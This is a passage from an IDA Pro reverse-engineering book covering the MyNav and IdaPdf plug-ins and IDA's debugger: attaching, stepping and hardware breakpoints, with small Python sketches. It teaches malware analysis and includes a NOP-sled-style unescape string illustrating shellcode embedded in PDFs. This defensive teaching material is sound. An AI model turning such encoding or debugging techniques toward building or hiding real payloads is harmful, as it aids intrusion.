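        "bases": [b.strip() for b in bases.split(",") if b.strip()],
        "multiple_inheritance": flag.strip() == "[MI]",
    }


rows = [
    "0041A2A8 0003 ChildClass: SuperClass1, SuperClass2; [MI]",
    "0041A2D8 0004 BaseClass; [SI]",
    "0041A2EC 0005 SubClass: BaseClass; [SI]",
]
for row in rows:
    info = parse_row(row)
    print("%08X %-12s bases=%s" % (info["vftable"], info["class"], info["bases"]))
```

With the rows in this form, it takes only a few more lines to build an inheritance map keyed by class name.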

MyNav

While not, strictly speaking, a plug-in, Joxean Koret’s Python scripts, dubbed

MyNav, certainly qualify as a useful IDA extension, useful enough that MyNav

earned the top spot in the Hex-Rays plug-in writing contest for 2010.14 The

mynav.py script should be launched after you have loaded a binary and the

initial autoanalysis has completed. Upon launch, MyNav adds 20 new menu

options to IDA’s Edit ▸ Plugins menu, at which point you are ready to take

advantage of a number of new features.

Among the features added by MyNav are a function-level (as opposed

to basic block-level) graphical browser inspired by Zynamics’s BinNavi, addi-

tional graphing features such as displaying the code paths between any two

functions, and a number of features designed to enhance IDA’s debugging

capabilities.

For debugging, MyNav records information about debugging sessions

and allows you to use the results of one debugging session to serve as a filter

for subsequent sessions. Following any debugging session, MyNav displays a

graph that highlights only those functions executed during the session. Using

14. See http://www.hex-rays.com/contest2010/#mynav.

Name          MyNav
Author        Joxean Koret
Distribution  Python source
Price         Free
Description   Debugger tracing and code coverage tool
Information   http://code.google.com/p/mynav/


the capabilities offered by MyNav, it is possible to quickly narrow down sets

of functions that are responsible for specific actions within a program. For

example, if you happen to be interested in the functions that are responsible

for initiating network connections and downloading some content, you might

create a session that does everything but initiate a network connection and

then conduct a second session in which you do create a network connection.

By excluding all functions that executed during your first debugging session,

the resulting graph will contain hits for just those functions responsible for

initiating the network connection. This feature is very useful if you are trying

to characterize functions within very large binaries.
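At its core, this kind of session filtering is a set difference over the functions hit in each run. The following sketch shows only that idea and says nothing about how MyNav stores its sessions; the function name new_functions and the sample function names are hypothetical.

```python
def new_functions(baseline_hits, session_hits):
    """Functions executed in the second session but not in the baseline."""
    return sorted(set(session_hits) - set(baseline_hits))


# Session 1: exercise the program without touching the network.
baseline = {"main", "parse_args", "load_config", "draw_window"}
# Session 2: repeat the same steps, then start a download.
with_network = {"main", "parse_args", "load_config", "draw_window",
                "resolve_host", "open_connection", "fetch_content"}

print(new_functions(baseline, with_network))
```

The quality of the result depends on how thoroughly the baseline session exercises everything except the behavior of interest, so it is often worth repeating the baseline run a few times before filtering.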

For a full discussion of MyNav’s features, please refer to Joxean’s blog,15

where you will find a number of video walkthroughs demonstrating some of

the capabilities of MyNav.

IdaPdf

Document-based malware is becoming increasingly common. Malicious PDF

files are one example of document files designed to exploit vulnerabilities in

document-viewing software. Analyzing malicious PDF files (or any document

files for that matter) requires that you understand the structure of the file

you are analyzing. In dissecting the structure of such a file, your goal is often

to discover any embedded code that may get executed if the document is suc-

cessfully utilized to compromise a computer used to view it. The few PDF

analysis tools that exist are primarily targeted at the command-line user with

the goal of facilitating the extraction of information that might ultimately be

loaded into IDA for further analysis.

IdaPdf consists of an IDA loader module and an IDA plug-in module,

each designed to facilitate the analysis of PDF files. The loader component

of IdaPdf recognizes PDF files and loads them into a new IDA database. The

loader takes care of breaking the PDF into its individual components. During

the loading process, the loader makes every attempt to extract and filter all

PDF stream objects. Since loader modules get unloaded once the load process

is complete, a second component, the IdaPdf plug-in, is required in order

to provide PDF analysis capabilities beyond the initial loading. The plug-in

module, upon recognizing that a PDF file has been loaded, proceeds to enu-

merate all of the PDF objects contained within the file and opens a new

15. See http://www.joxeankoret.com/blog/2010/05/02/mynav-a-python-plugin-for-ida-pro/.

Name          IdaPdf
Author        Chris Eagle
Distribution  C++ source
Price         Free
Description   PDF loader and plug-in for dissecting and navigating PDF files
Information   http://www.idabook.com/idapdf/


tabbed window containing a list of every object within the PDF. The follow-

ing listing is representative of the type of information contained in the PDF

Objects window.

Num  Location  Type        Data Offs  Data size  Filters         Filtered stream  Filtered size  Ascii
17   000e20fe  Stream      000e2107   313        /FlateDecode    000f4080         210            No
35   00000010  Dictionary  00000019   66                                                         Yes
36   000002a3  Dictionary  000002ac   122                                                        Yes
37   0000032e  Stream      00000337   470        [/FlateDecode]  000f4170         1367           Yes

The listing shows object numbers along with the location of the object,

the object’s data, any filters that must be applied to stream objects, and a

pointer to the extracted, unfiltered data. Context-sensitive menu options

allow for easy navigating to view either the object data or any extracted fil-

tered data. The opportunity to extract object data, either raw or filtered,

is also made available via context-sensitive menu options. The Ascii column

indicates the plug-in’s best-effort opinion as to whether the object contains

only ASCII data in its raw or filtered versions.
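The /FlateDecode filter that appears in the listing denotes zlib (deflate) compression, so applying it by hand requires very little code. The sketch below handles only that one filter, and the names apply_filters and looks_ascii are ours; it is meant to show what "filtered" data is, not to reproduce IdaPdf's implementation or its Ascii heuristic.

```python
import zlib


def apply_filters(raw, filters):
    """Run a stream's raw bytes through its filter chain, in order."""
    data = raw
    for name in filters:
        if name == "/FlateDecode":
            data = zlib.decompress(data)
        else:
            # Other PDF filters are outside the scope of this sketch.
            raise NotImplementedError(name)
    return data


def looks_ascii(data):
    """A simple best-effort test: every byte is below 0x80."""
    return all(byte < 0x80 for byte in data)


# Build a stand-in stream body, since no sample file accompanies the text.
script = b"var payload = unescape('%u9090%u9090');"
stream = zlib.compress(script)

print(looks_ascii(stream), looks_ascii(apply_filters(stream, ["/FlateDecode"])))
```

A stream whose raw bytes are binary can still expand into plain text such as JavaScript, which is why it is useful to examine both the raw and the filtered versions of an object.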

The last features implemented by IdaPdf are exposed through the addition

of two new menu options under Edit ▸ Other when IdaPdf is launched.

These menu options allow you to highlight a block of data in the database

and then ask the plug-in to Base64 decode the data or unescape16 the data,

with the results being copied into a newly created segment within IDA. Such

decoded data will often turn out to be the malicious payload contained

within the PDF. Since the plug-in extracts this data to a new IDA segment,

it is fairly straightforward to navigate to the extracted data and ask IDA to

disassemble some or all of it.
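Both decoding operations are easy to reproduce outside of IDA when you want to check a result. The sketch below uses Python's standard base64 module and a small reimplementation of the JavaScript unescape function; the function names are ours, and the choice to lay the resulting string out as little-endian 16-bit units is an assumption about how a script engine would hold the data in memory, not a statement about what IdaPdf does internally.

```python
import base64
import re

# %uXXXX (16-bit unit) or %XX (8-bit value), as accepted by unescape().
_ESCAPE = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")


def js_unescape(text):
    """Mimic JavaScript's unescape(): each escape becomes one character."""
    def replace(match):
        return chr(int(match.group(1) or match.group(2), 16))
    return _ESCAPE.sub(replace, text)


def to_bytes(text):
    """Lay the string out as UTF-16LE code units (an assumed memory layout)."""
    return text.encode("utf-16-le", "surrogatepass")


print(base64.b64decode("SGVsbG8="))
print(to_bytes(js_unescape("%u9090%uCCCC")).hex())
```

Note how each %uXXXX escape contributes two bytes in swapped order, which is why shellcode embedded this way looks byte-reversed in the script text.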

Summary

Anytime you find yourself wishing that IDA could perform some task, you

should take a moment to wonder whether anyone else may have had the

same wish and, further, whether someone has done something about imple-

menting the missing functionality. Many IDA plug-ins are the result of exactly

this kind of effort. The vast majority of publicly available plug-ins are short

and sweet and designed to solve a specific problem. In addition to serving as

potential solutions for your reverse engineering problems, plug-ins for which

source code is available can serve as valuable references for interesting uses

of the IDA SDK.

16. The plug-in implements the JavaScript unescape function.

PART VI

THE IDA DEBUGGER


THE IDA DEBUGGER

IDA is most widely known as a disassem-

bler, and it is clearly one of the finest tools

available for performing static analysis of

binaries. Given the sophistication of modern

anti–static analysis techniques, it is not uncommon

to combine static analysis tools and techniques with

dynamic analysis tools and techniques in order to take advantage of the best

of both worlds. Ideally, all of these tools would be integrated into a single pack-

age. Hex-Rays made that move when it introduced a debugger in version 4.5

of IDA and solidified IDA’s role as a general-purpose reverse engineering

tool. With each successive version of IDA, its debugging capabilities have been

improved. In its latest version, IDA is capable of local and remote debugging

on a number of different platforms and supports a number of different pro-

cessors. IDA may also be configured to act as a frontend to Microsoft’s WinDbg

debugger, making it possible to perform Windows kernel debugging.

Over the course of the next few chapters, we will cover the basic features

of IDA’s debugger, using the debugger to assist with obfuscated code analysis

and remote debugging of Windows, Linux, or OS X binaries. While we assume

514 Chapter 24

that the reader possesses some familiarity with the use of debuggers, we will

review many of the basic capabilities of debuggers in general as we progress

through the features of IDA’s debugger.

Launching the Debugger

Debuggers are typically used to perform one of two tasks: examining memory

images (core dumps) associated with crashed processes and executing pro-

cesses in a very controlled manner. A typical debugging session begins with

the selection of a process to debug. There are two ways this is generally

accomplished. First, most debuggers are capable of attaching to a running

process (assuming the user has permission to do so). Depending on the

debugger being used, the debugger itself may be able to present a list of

available processes to choose from. Lacking such capability, the user must

determine the ID of the process to which he wishes to attach and then com-

mand the debugger to attach to the specified process. The precise manner

by which a debugger attaches to a process varies from one operating system

to another and is beyond the scope of this book. When attaching to an exist-

ing process, it is not possible to monitor or control the process’s initial startup

sequence, because all of the startup and initialization code will already have

completed before you have a chance to attach to the process.

The manner by which you attach to a process with the IDA debugger

depends on whether a database is currently open or not. When no database

is open, the Debugger ▸ Attach menu is available, as shown in Figure 24-1.

Figure 24-1: Attaching to an arbitrary process

Available options allow selection of different IDA debuggers (remote

debugging is covered in Chapter 26). Options vary depending on the plat-

form on which you are running IDA. Selecting a local debugger causes IDA

to display a list of running processes to which you may attach. Figure 24-2

shows an example of such a list.


Figure 24-2: Debugger process-selection dialog

Once a process has been selected, the debugger creates a temporary

database by taking a memory snapshot of the running process. In addition

to the memory image of the running process, the temporary database con-

tains sections for all shared libraries loaded by the process, resulting in a sub-

stantially larger and more cluttered database than you may be accustomed

to. One drawback to attaching to a process in this manner is that IDA has less

information available to disassemble the process because IDA’s loader never

processes the corresponding executable file

image and an automated analysis of the binary

is never performed. In fact, once the debugger

has attached to the process, the only instruc-

tions that will be disassembled in the binary are

the instruction referenced by the instruction

pointer and those that flow from it. Attaching

to a process immediately pauses the process,

allowing you the opportunity to set breakpoints

prior to resuming execution of the process.

An alternate way to attach to a running

process is to open the associated executable in

IDA before attempting to attach to the running

process. With a database open, the Debugger

menu takes on an entirely different form, as

shown in Figure 24-3.

If you are not presented with this menu

(or one very like it), then you probably have

not yet specified a debugger to use for the currently

open file type. In such cases, Debugger ▸

Select Debugger will present a list of suitable

debuggers given the current file type. Figure

24-4 shows a typical debugger selection dialog.

Figure 24-3: Debugger menu with a database open

Figure 24-4: Debugger selection dialog

You may make your selection the default debugger for the current file type by checking the box at the bottom of the dialog. The current default debugger, if any, is noted just above the checkbox. Once you have selected a debugger, you may change debuggers at any time via the Debugger ▸ Switch Debugger menu.

When DebuggerAttach to Process is selected, IDA’s behavior will vary

depending on the type of file opened in the active database. If the file is an

executable file, IDA will display a list of all processes that have the same name

as the file opened in the database. If IDA can find no process with a match-

ing name, IDA will display a list of every running process and leave it to you

to choose the correct process to attach to. In any case, you may attach to any

of the displayed processes, but IDA has no way to guarantee that the process

was started with same binary image that is loaded in the open IDA database.

IDA behaves differently if the currently open database is a shared library. On Windows systems, IDA will filter the displayed process list to just those processes that have the corresponding .dll file loaded. For example, if you are currently analyzing wininet.dll in IDA, then when you select Debugger ▸ Attach to Process, you will see only those processes that currently have wininet.dll loaded. On Linux and OS X systems, IDA does not have this filtering ability and displays every process to which you have the rights to attach.
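The selection rules described above can be summarized in a few lines of Python. This is only a sketch of the described behavior, not IDA code: the process records, the function name attach_candidates, and the case-insensitive name comparison are all assumptions made for illustration.

```python
def attach_candidates(processes, db_file, is_shared_library=False):
    """Model of the process list offered when attaching with a database open.

    processes: list of dicts with hypothetical keys "name" and "modules".
    db_file:   name of the file loaded in the open database.
    """
    wanted = db_file.lower()
    if is_shared_library:
        # Windows-style filtering: only processes that have the library loaded.
        return [p for p in processes
                if wanted in (m.lower() for m in p["modules"])]
    # Executable: prefer processes with a matching name, else show everything.
    same_name = [p for p in processes if p["name"].lower() == wanted]
    return same_name or list(processes)


procs = [
    {"name": "iexplore.exe", "modules": ["kernel32.dll", "wininet.dll"]},
    {"name": "notepad.exe", "modules": ["kernel32.dll"]},
]
by_library = attach_candidates(procs, "wininet.dll", is_shared_library=True)
by_name = attach_candidates(procs, "notepad.exe")
no_match = attach_candidates(procs, "calc.exe")
```

Note that a name match says nothing about whether the running process was actually started from the same binary image as the one in the database.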

As an alternative to attaching to an existing process, you may opt to launch a new process under debugger control. With no database open, a new process can be launched via Debugger ▸ Run. When a database is open, a new process can be launched via Debugger ▸ Start Process or Debugger ▸ Run to Cursor. Using the former causes the new process to execute until it hits a breakpoint (which you need to have set prior to choosing Debugger ▸ Start Process) or until you elect to pause the process using Debugger ▸ Pause Process. Using Debugger ▸ Run to Cursor automatically sets a breakpoint at the current cursor location prior to starting the new process. In this case, the new process will execute until the current cursor location is reached or until an earlier breakpoint is hit. If execution never reaches the current cursor location (or any other breakpoint), the process will continue to run until it is forcibly paused or terminated (Debugger ▸ Terminate Process).

Launching a process under debugger control (as opposed to attaching

to an existing process) is the only way to monitor every action the process

takes. With breakpoints set prior to process initiation, it becomes possible

to closely monitor a process’s entire startup sequence. Controlling startup

sequences is particularly important in the case of programs that have been

obfuscated, because you will often want to pause the process immediately

after the de-obfuscation routines complete and before the process begins

its normal operations.

Another advantage to launching a process from an open IDA database is

that IDA performs its initial autoanalysis on the process image before launch-

ing the process. This results in significantly better disassembly quality over

that attained when attaching the debugger to an existing process.

IDA’s debugger is capable of both local and remote debugging. For local debugging, you can only debug binaries that will run on your platform. There is no emulation layer that allows binaries from alternate platforms or CPU types to be executed within IDA’s local debugger. For remote debugging, IDA ships with a number of debugging servers including implementations for Windows 32/64, Windows CE/ARM, Mac OS X 32/64, Linux 32/64/ARM, and Android. The debugging servers are intended to execute alongside the binary that you intend to debug. Once you have a remote debugging server running, IDA can communicate with the server to launch or attach to a target process on the remote machine. For Windows CE ARM devices, IDA communicates with the remote device using ActiveSync and installs the debugging server remotely. IDA is also capable of communicating with the gdbserver[1] component of the GNU Debugger[2] (gdb) or with programs that are linked with a suitable gdb remote stub.[3] Finally, for remote debugging on Symbian devices, you must install and configure Metrowerks’ App TRK[4] in order for IDA to communicate with the device over a serial port. In any case, IDA is capable of acting as a debugger frontend only for processes running on x86, x64, MIPS, ARM, and PPC processors. Remote debugging is discussed in Chapter 26.

1. See http://www.sourceware.org/gdb/current/onlinedocs/gdb/Server.html#Server.

2. See http://www.gnu.org/software/gdb/.

3. See http://www.sourceware.org/gdb/current/onlinedocs/gdb/Remote-Stub.html#Remote-Stub.

4. See http://www.tools.ext.nokia.com/agents/index.htm.

As with any other debugger, if you intend to use IDA’s debugger to launch new processes, the original executable file is required to be present on the debugging host, and the original binary will be executed with the full privileges of the user running IDA. In other words, it is not sufficient to have only an IDA database loaded with the binary you wish to debug. This is extremely important to understand if you intend to use the IDA debugger for malware analysis. You can easily infect the debugging target machine if you fail to properly control the malware sample. IDA attempts to warn you of this possibility anytime you select Debugger ▸ Start Process (or Debugger ▸ Attach to Process with an open database) by displaying a debugger warning message stating the following:

You are going to launch the debugger. Debugging a program

means that its code will be executed on your system.

Be careful with malicious programs, viruses and trojans!

REMARK: if you select ‘No’, the debugger will be automatically

disabled.

Are you sure you want to continue?

Selecting No in response to this warning causes the Debugger menu

to be removed from the IDA menu bar. The Debugger menu will not be

restored until you close the active database.

It is highly recommended that you perform any debugging of malicious

software within a sandbox environment. In contrast, the x86 emulator plug-

in discussed in Chapter 21 neither requires that the original binary be present

nor executes any of the binary’s instructions on the machine performing the

emulation.

Basic Debugger Displays

Regardless of how you happen to launch the debugger, once your process of

interest has been paused under debugger control, IDA enters its debugger

mode (as opposed to normal disassembly mode), and you are presented with

several default displays. The default debugger display is shown in Figure 24-5.

Figure 24-5: IDA debugger display


If you are accustomed to using other Windows debuggers such as OllyDbg[5] or Immunity Debugger,[6] one of your first thoughts might be that not much information is displayed on the screen. This is primarily a result of the fact that IDA defaults to a font size that is actually readable. If you find yourself missing the micro fonts used in other debuggers, you can easily change things via the Options ▸ Font menu. You may also wish to make use of saved IDA desktops (Windows ▸ Save Desktop) if you develop a fondness for a specific layout of your debugger windows.

As shown in Figure 24-5, the debugger toolbar ① replaces the disassembly toolbar. A number of standard (from a debugging standpoint) tools are present, including process control tools and breakpoint manipulation tools.

The IDA View-EIP ② disassembly window is a default disassembly listing

window when the debugger is active. It also happens to be synchronized with

the current value of the instruction pointer register. If IDA detects that a reg-

ister points to a memory location within the disassembly window, the name

of that register is displayed in the left margin, opposite the address to which

the register points. In Figure 24-5, the location to which EIP points is flagged

in IDA View-EIP (note that EDX also points to the same location in this exam-

ple). By default, IDA highlights breakpoints in red and the next instruction

to be executed (the one to which the instruction pointer points) in blue.

Debugger-related disassemblies are generated via the same disassembly pro-

cess used in standard disassembly mode. Thus, IDA’s debugger offers per-

haps the best disassembly capability to be found in a debugger. Additionally,

if you launched the debugger from an open IDA database, IDA is able to

characterize all of the executable content based on analysis performed prior

to launching the debugger. IDA’s ability to disassemble any library code that

has been loaded by the process will be somewhat more limited because IDA

has not had a chance to analyze the associated .dll file prior to launching the

debugger.

The Stack View ③ window is another standard disassembly view primarily used to display the data contents of the process’s runtime stack. All registers that point to stack locations are noted as such in the General Registers ④ view (such as EBP in this case). Through the use of comments, IDA makes every attempt to provide context information for each data item on the stack. When the stack item is a memory address, IDA attempts to resolve the address to a function location (this helps highlight the location from which a function was called). When the stack item is a data pointer, a reference to the associated data item is displayed. The remaining default displays include the Hex view ⑤, which offers a standard hex dump of memory, the Modules ⑥ view, which displays a list of modules currently loaded in the process image, and the Threads ⑦ view, which displays a list of threads in the current process. Double-clicking any listed thread causes the IDA View-EIP disassembly window to jump to the current instruction within the selected thread and updates the General Registers view to reflect the current values for registers within the selected thread.

5. See http://www.ollydbg.de/.

6. See http://www.immunityinc.com/products-immdbg.shtml.

The General Registers window (also shown in Figure 24-6) displays the

current contents of the CPU’s general-purpose registers. Additional windows

for displaying the contents of the CPU’s segment, floating-point, or MMX

registers may be opened from the Debugger menu.

Figure 24-6: The General Registers display

Within the General Registers window, register contents are displayed to the right of the associated register name, followed by a description of each register’s contents. CPU flag bits are displayed in the rightmost column. Right-clicking a register value or flag bit provides access to a Modify

menu item, which allows you to change the contents of any register or CPU

flag. Menu options offer quick access to zero a value, toggle a value, incre-

ment a value, or decrement a value. Toggling values is particularly useful for

changing CPU flag bits. Right-clicking any register value also provides access

to the Open Register Window menu item. Selecting Open Register Window

causes IDA to open a new disassembly window centered at the memory loca-

tion held in the selected register. If you ever find that you have inadvertently

closed either IDA View-EIP or IDA View-ESP, use the Open Register Window

command on the appropriate register to reopen the lost window. If a register

appears to point to a valid memory location, then the right-angle arrow con-

trol to the right of that register’s value will be active and highlighted in black.

Clicking an active arrow opens a new disassembly view centered on the corre-

sponding memory location.
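Toggling a flag amounts to an exclusive-or of a single bit in the flags register. The following Python sketch is not IDA code; it only models the arithmetic, using the architectural bit positions of a few x86 EFLAGS bits. The names FLAG_BITS, get_flag, and toggle_flag are made up for this illustration.

```python
# Bit positions of selected x86 EFLAGS bits (architectural values).
FLAG_BITS = {"CF": 0, "PF": 2, "ZF": 6, "SF": 7, "OF": 11}


def get_flag(eflags, name):
    """Return the current value (0 or 1) of the named flag bit."""
    return (eflags >> FLAG_BITS[name]) & 1


def toggle_flag(eflags, name):
    """Return a copy of eflags with the named flag bit inverted."""
    return eflags ^ (1 << FLAG_BITS[name])


eflags = 0x00000206                   # example value with PF set and ZF clear
flipped = toggle_flag(eflags, "ZF")   # ZF goes from 0 to 1
```

Toggling ZF while paused on a conditional jump such as jz is a common way to force execution down the branch that would not otherwise be taken.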

The Modules window displays a list of all executable files and shared

libraries loaded into the process memory space. Double-clicking any module

named in the list opens a list of symbols exported by that module. Figure 24-7

shows an example of the contents of kernel32.dll. The symbol list provides an

easy way to track down functions within loaded libraries if you wish to set

breakpoints on entry to those functions.

Figure 24-7: The Modules window with associated module contents

Additional debugger displays are accessible using various debugger

menu selections. Displays pertaining to debugger operations will be discussed

in the following section, “Process Control.” Along with the debugger-specific

displays, all traditional IDA subviews, such as Functions and Segments, remain

available via the ViewsOpen Subviews command.

Process Control

Perhaps the most important feature of any debugger is the ability to closely

control—and modify, if desired—the behavior of the process being debugged.

To that end, most debuggers offer commands that allow one or more instruc-

tions to be executed before returning control to the debugger. Such com-

mands are often used in conjunction with breakpoints that allow the user to

specify that execution should be interrupted when a designated instruction

is reached or when a specific condition is met.

Basic execution of a process under debugger control is accomplished

through the use of various Step, Continue, and Run commands. Because

they are used so frequently, it is helpful to become familiar with the toolbar

buttons and hotkey sequences associated with these commands. Figure 24-8

shows the toolbar buttons associated with execution of a process.

Figure 24-8: Debugger process control tools (buttons labeled Continue, Pause, Terminate [CTRL-F2], Step Into, Step Over, Run Until Return [CTRL-F7], and Run to Cursor)

The behavior of each of these commands is described in the following list:

Continue: Resumes execution of a paused process. Execution continues until a breakpoint is hit, the user pauses or terminates execution, or the process terminates on its own.

Pause: Pauses a running process.

Terminate: Terminates a running process.

Step Into: Executes the next instruction only. If the next instruction is a function call, breaks on the first instruction of the target function. Hence the name Step Into, since execution steps into any function being called.

Step Over: Executes the next instruction only. If the next instruction is a function call, treats the call as a single instruction, breaking once the function returns. Hence the name Step Over, since stepping proceeds over functions rather than through them as with Step Into. Execution may be interrupted prior to completion of the function call if a breakpoint is encountered. Step Over is very useful as a time-saver when the behavior of a function is well known and uninteresting.

Run Until Return: Resumes execution of the current function and does not stop until that function returns (or a breakpoint is encountered). This operation is useful when you have seen enough of a function and you wish to get out of it or when you inadvertently step into a function that you meant to step over.

Run to Cursor: Resumes execution of the process and stops when execution reaches the current cursor location (or a breakpoint is hit). This feature is useful for running through large blocks of code without the need to set a permanent breakpoint at each location where you wish to pause. Beware that the program may not pause if the cursor location is bypassed or otherwise never reached.
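The difference between Step Into, Step Over, and Run Until Return can be illustrated with a toy machine. The sketch below is a simplified model under stated assumptions: the three-instruction "CPU" (nop, call, ret), the ToyCPU class, and its method names are invented for this example, breakpoints are ignored, and Step Over is modeled by repeated single-stepping rather than by whatever mechanism a real debugger uses.

```python
class ToyCPU:
    """Tiny model: program is a list of (mnemonic, operand) tuples."""

    def __init__(self, program, entry=0):
        self.program = program
        self.ip = entry
        self.stack = []            # holds return addresses only

    def step_into(self):
        """Execute exactly one instruction, following calls."""
        op, arg = self.program[self.ip]
        if op == "call":
            self.stack.append(self.ip + 1)
            self.ip = arg
        elif op == "ret":
            self.ip = self.stack.pop()
        else:
            self.ip += 1

    def step_over(self):
        """Treat a call as one instruction: stop once it has returned."""
        op, _ = self.program[self.ip]
        if op != "call":
            return self.step_into()
        resume_at, depth = self.ip + 1, len(self.stack)
        self.step_into()
        while not (self.ip == resume_at and len(self.stack) == depth):
            self.step_into()

    def run_until_return(self):
        """Run until the current function returns (assumes we are inside one)."""
        depth = len(self.stack)
        while len(self.stack) >= depth:
            self.step_into()


program = [
    ("nop", None),   # 0
    ("call", 4),     # 1: call the function at index 4
    ("nop", None),   # 2: execution resumes here after the call
    ("nop", None),   # 3
    ("nop", None),   # 4: function body
    ("call", 7),     # 5: nested call
    ("ret", None),   # 6
    ("nop", None),   # 7: nested function body
    ("ret", None),   # 8
]

a = ToyCPU(program)
a.step_into()          # executes the nop at 0
a.step_over()          # runs the whole call at 1, including the nested call

b = ToyCPU(program)
b.step_into()          # nop at 0
b.step_into()          # enters the function: ip is now 4
ip_inside = b.ip
b.run_until_return()   # finishes the function and stops back in the caller
```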

In addition to toolbar and hotkey access, all of the execution control

commands are accessible via the Debugger menu. Regardless of whether a

process pauses after a single step or hitting a breakpoint, each time the pro-

cess pauses, all debugger-related displays are updated to reflect the state of

the process (CPU registers, flags, memory contents) at the time the process

was paused.

Breakpoints

Breakpoints are a debugger feature that goes hand in hand with process exe-

cution and interruption (pausing). Breakpoints are set as a means of inter-

rupting program execution at very specific locations within the program. In

a sense a breakpoint is a more permanent extension of the Run to Cursor

concept in that once a breakpoint is set at a given address, execution will

always be interrupted when execution reaches that location, regardless of

whether the cursor remains positioned on that location or not. However,

while there is only one cursor to which execution can run, it is possible to

set many breakpoints all over a program, the arrival at any one of which will


interrupt execution of the program. Breakpoints are set in IDA by navigating

to the location at which you want execution to pause and using the F2 hotkey

(or right-clicking and selecting Add Breakpoint). Addresses at which break-

points have been set are highlighted with a red (by default) band across the

entire disassembly line. A breakpoint may be removed by pressing F2 a second time to toggle the breakpoint off. A complete list of breakpoints currently set within a program may be viewed via Debugger ▸ Breakpoints ▸ Breakpoint List.

By default, IDA utilizes software breakpoints, which are implemented by

replacing the opcode byte at the breakpoint address with a software break-

point instruction. For x86 binaries, this is the int 3 instruction, which uses

opcode value 0xCC. Under normal circumstances, when a software breakpoint

instruction is executed, the operating system transfers control to any debugger

that may be monitoring the interrupted process. As discussed in Chapter 21,

obfuscated code may take advantage of the behavior of software breakpoints

in an attempt to hinder normal operation of any attached debugger.
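As a rough illustration of the byte-replacement idea, the following Python sketch patches a buffer standing in for process memory. It is a model only: the SoftwareBreakpoints class is hypothetical, and the bookkeeping of original bytes is an assumption about how a debugger would restore the instruction later, not a description of IDA internals.

```python
INT3 = 0xCC  # x86 software breakpoint opcode


class SoftwareBreakpoints:
    """Tracks bytes overwritten with int 3 so they can be restored."""

    def __init__(self, memory):
        self.memory = memory       # bytearray standing in for process memory
        self.saved = {}            # address -> original byte

    def set(self, addr):
        if addr not in self.saved:
            self.saved[addr] = self.memory[addr]
            self.memory[addr] = INT3

    def clear(self, addr):
        self.memory[addr] = self.saved.pop(addr)


# push ebp; mov ebp, esp; ret
code = bytearray(b"\x55\x89\xe5\xc3")
bps = SoftwareBreakpoints(code)
bps.set(1)                         # breakpoint on "mov ebp, esp"
patched = bytes(code)
bps.clear(1)
restored = bytes(code)
```

Because the patch changes the bytes of the program itself, code that checksums or scans its own instructions can notice the 0xCC byte, which is one reason obfuscated programs are able to interfere with software breakpoints.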

As an alternative to software breakpoints, some CPUs (such as the x86 family, beginning with the 386) offer support for hardware-assisted breakpoints. Hardware breakpoints are typically configured through the use of dedicated CPU

registers. For x86 CPUs, these registers are called DR0–7 (debug registers 0

through 7). A maximum of four hardware breakpoints can be specified using

x86 registers DR0–3. The remaining x86 debug registers are used to specify

additional constraints on each breakpoint. When a hardware breakpoint is

enabled, there is no need to substitute a special instruction into the program

being debugged. Instead, the CPU itself decides whether execution should

be interrupted or not based on values contained within the debug registers.

Once a breakpoint has been set, it is possible to modify various aspects of

its behavior. Beyond simply interrupting the process, debuggers often sup-

port the concept of conditional breakpoints, which allow users to specify a con-

dition that must be satisfied before the breakpoint is actually honored. When

such a breakpoint is reached and the associated condition is not satisfied, the

debugger automatically resumes execution of the program. The general idea

is that the condition is expected to be satisfied at some point in the future,

resulting in interruption of the program only when the condition you are

interested in has been satisfied.

The IDA debugger supports both conditional and hardware breakpoints.

In order to modify the default (unconditional, software-based) behavior of

a breakpoint, you must edit a breakpoint after it has been set. In order to

access the breakpoint-editing dialog, you must right-click an existing break-

point and select Edit Breakpoint. Figure 24-9 shows the resulting Breakpoint

Settings dialog.


Figure 24-9: The Breakpoint Settings dialog

The Location box indicates the address of the breakpoint being edited,

while the Enabled checkbox indicates whether the breakpoint is currently

active or not. A breakpoint that is disabled is not honored regardless of any

condition that may be associated with the breakpoint. The Hardware check-

box is used to request that the breakpoint be implemented in hardware

rather than software.

WARNING A word of caution concerning hardware breakpoints: Though the x86 only supports

four hardware breakpoints at any given time, as of this writing (IDA version 6.1), IDA

will happily allow you to designate more than four hardware breakpoints. However,

only four of them will be honored. Any additional hardware breakpoints will be

ignored.

When specifying a hardware breakpoint, you must use the Hardware

breakpoint mode radio buttons to specify whether the breakpoint behavior

is to break on execute, break on write, or break on read/write. The latter

two categories (break on write and break on read/write) allow you to create

breakpoints that trigger when a specific memory location (usually a data

location) is accessed, regardless of what instruction happens to be executing

at the time the access takes place. This is very useful if you are more inter-

ested in when your program accesses a piece of data than where the data is

accessed from.

In addition to specifying a mode for your hardware breakpoint, you must

specify a size. For execute breakpoints the size must be 1 byte. For write or

read/write breakpoints, the size may be set to 1, 2, or 4 bytes. When the size

is set to 2 bytes, the breakpoint’s address must be word aligned (a multiple

of 2 bytes). Similarly, for 4-byte breakpoints, the breakpoint address must be

double-word aligned (a multiple of 4 bytes). A hardware breakpoint’s size is

combined with its address to form a range of bytes over which the breakpoint

may be triggered. An example may help to explain. Consider a 4-byte write breakpoint set at address 0804C834h. This breakpoint will be triggered by a 1-byte write to 0804C837h, a 2-byte write to 0804C836h, and a 4-byte write to 0804C832h, among others. In each of these cases, at least 1 byte in the range 0804C834h–0804C837h is written. More information on the behavior of x86 hardware breakpoints can be found in the Intel 64 and IA-32 Architectures Software Developer’s Manual, Volume 3B: System Programming Guide, Part 2.[7]
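The size, alignment, and range rules above reduce to a simple overlap test. The Python sketch below models only the rules as stated in this section; the function names are invented for illustration, and the actual matching is performed by the CPU, not by code like this.

```python
def valid_hw_breakpoint(addr, size, mode):
    """Check the size and alignment rules for a hardware breakpoint.

    mode is one of "execute", "write", or "read/write".
    """
    if mode == "execute":
        return size == 1
    return size in (1, 2, 4) and addr % size == 0


def access_triggers(bp_addr, bp_size, access_addr, access_size):
    """True if the accessed bytes overlap the breakpoint's byte range."""
    return (access_addr < bp_addr + bp_size
            and bp_addr < access_addr + access_size)


BP = 0x0804C834   # 4-byte write breakpoint from the example above
hits = [
    access_triggers(BP, 4, 0x0804C837, 1),   # last byte of the range
    access_triggers(BP, 4, 0x0804C836, 2),   # upper half of the range
    access_triggers(BP, 4, 0x0804C832, 4),   # straddles the start of the range
]
miss = access_triggers(BP, 4, 0x0804C830, 4)  # ends just before the range
```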

Conditional breakpoints are created by providing an expression in the

Breakpoint Settings dialog’s Condition field. Conditional breakpoints are a

